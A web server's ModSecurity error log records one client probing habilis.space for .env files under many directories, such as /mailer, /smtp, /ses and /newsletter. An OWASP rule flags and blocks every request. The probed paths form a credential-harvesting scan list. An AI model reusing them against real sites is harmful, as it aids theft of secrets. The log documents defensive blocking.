[Mon May 11 17:33:50.640590 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/.env.backup2"] [unique_id "agH23vy_GXSWIKeli0sMRAAAAI8"]
[Mon May 11 17:33:50.640827 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH23vy_GXSWIKeli0sMRAAAAI8"]
[Mon May 11 17:33:50.761290 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /logs/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/logs/.env"] [unique_id "agH23vy_GXSWIKeli0sMRQAAAI8"]
[Mon May 11 17:33:50.761521 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/logs/.env"] [unique_id "agH23vy_GXSWIKeli0sMRQAAAI8"]
[Mon May 11 17:33:50.761766 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH23vy_GXSWIKeli0sMRQAAAI8"]
[Mon May 11 17:33:50.913571 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cache/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/cache/.env"] [unique_id "agH23vy_GXSWIKeli0sMRgAAAI8"]
[Mon May 11 17:33:50.913877 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/cache/.env"] [unique_id "agH23vy_GXSWIKeli0sMRgAAAI8"]
[Mon May 11 17:33:50.914117 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH23vy_GXSWIKeli0sMRgAAAI8"]
[Mon May 11 17:33:51.033649 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mailer/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/mailer/.env"] [unique_id "agH23_y_GXSWIKeli0sMRwAAAI8"]
[Mon May 11 17:33:51.033888 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/mailer/.env"] [unique_id "agH23_y_GXSWIKeli0sMRwAAAI8"]
[Mon May 11 17:33:51.034091 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH23_y_GXSWIKeli0sMRwAAAI8"]
[Mon May 11 17:33:51.150277 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mail/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/mail/.env"] [unique_id "agH23_y_GXSWIKeli0sMSQAAAI8"]
[Mon May 11 17:33:51.150502 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/mail/.env"] [unique_id "agH23_y_GXSWIKeli0sMSQAAAI8"]
[Mon May 11 17:33:51.150749 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH23_y_GXSWIKeli0sMSQAAAI8"]
[Mon May 11 17:33:51.263764 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /email/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/email/.env"] [unique_id "agH23_y_GXSWIKeli0sMSgAAAI8"]
[Mon May 11 17:33:51.263996 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/email/.env"] [unique_id "agH23_y_GXSWIKeli0sMSgAAAI8"]
[Mon May 11 17:33:51.264231 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH23_y_GXSWIKeli0sMSgAAAI8"]
[Mon May 11 17:33:51.376696 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /smtp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/smtp/.env"] [unique_id "agH23_y_GXSWIKeli0sMSwAAAI8"]
[Mon May 11 17:33:51.376922 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/smtp/.env"] [unique_id "agH23_y_GXSWIKeli0sMSwAAAI8"]
[Mon May 11 17:33:51.377172 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH23_y_GXSWIKeli0sMSwAAAI8"]
[Mon May 11 17:33:51.488900 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mailing/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/mailing/.env"] [unique_id "agH23_y_GXSWIKeli0sMTAAAAI8"]
[Mon May 11 17:33:51.489134 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/mailing/.env"] [unique_id "agH23_y_GXSWIKeli0sMTAAAAI8"]
[Mon May 11 17:33:51.489366 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH23_y_GXSWIKeli0sMTAAAAI8"]
[Mon May 11 17:33:51.600385 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /notifications/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/notifications/.env"] [unique_id "agH23_y_GXSWIKeli0sMTgAAAI8"]
[Mon May 11 17:33:51.600555 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/notifications/.env"] [unique_id "agH23_y_GXSWIKeli0sMTgAAAI8"]
[Mon May 11 17:33:51.600755 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH23_y_GXSWIKeli0sMTgAAAI8"]
[Mon May 11 17:33:51.712965 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /notify/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/notify/.env"] [unique_id "agH23_y_GXSWIKeli0sMTwAAAI8"]
[Mon May 11 17:33:51.713214 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/notify/.env"] [unique_id "agH23_y_GXSWIKeli0sMTwAAAI8"]
[Mon May 11 17:33:51.713432 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH23_y_GXSWIKeli0sMTwAAAI8"]
[Mon May 11 17:33:51.824896 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /sender/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/sender/.env"] [unique_id "agH23_y_GXSWIKeli0sMUAAAAI8"]
[Mon May 11 17:33:51.825119 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/sender/.env"] [unique_id "agH23_y_GXSWIKeli0sMUAAAAI8"]
[Mon May 11 17:33:51.825373 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH23_y_GXSWIKeli0sMUAAAAI8"]
[Mon May 11 17:33:51.938026 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /campaign/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/campaign/.env"] [unique_id "agH23_y_GXSWIKeli0sMUQAAAI8"]
[Mon May 11 17:33:51.938273 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/campaign/.env"] [unique_id "agH23_y_GXSWIKeli0sMUQAAAI8"]
[Mon May 11 17:33:51.938517 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH23_y_GXSWIKeli0sMUQAAAI8"]
[Mon May 11 17:33:52.051983 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /newsletter/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/newsletter/.env"] [unique_id "agH24Py_GXSWIKeli0sMUgAAAI8"]
[Mon May 11 17:33:52.052251 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/newsletter/.env"] [unique_id "agH24Py_GXSWIKeli0sMUgAAAI8"]
[Mon May 11 17:33:52.052476 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH24Py_GXSWIKeli0sMUgAAAI8"]
[Mon May 11 17:33:52.173661 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /ses/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/ses/.env"] [unique_id "agH24Py_GXSWIKeli0sMUwAAAI8"]
[Mon May 11 17:33:52.173884 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/ses/.env"] [unique_id "agH24Py_GXSWIKeli0sMUwAAAI8"]
[Mon May 11 17:33:52.174107 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH24Py_GXSWIKeli0sMUwAAAI8"]
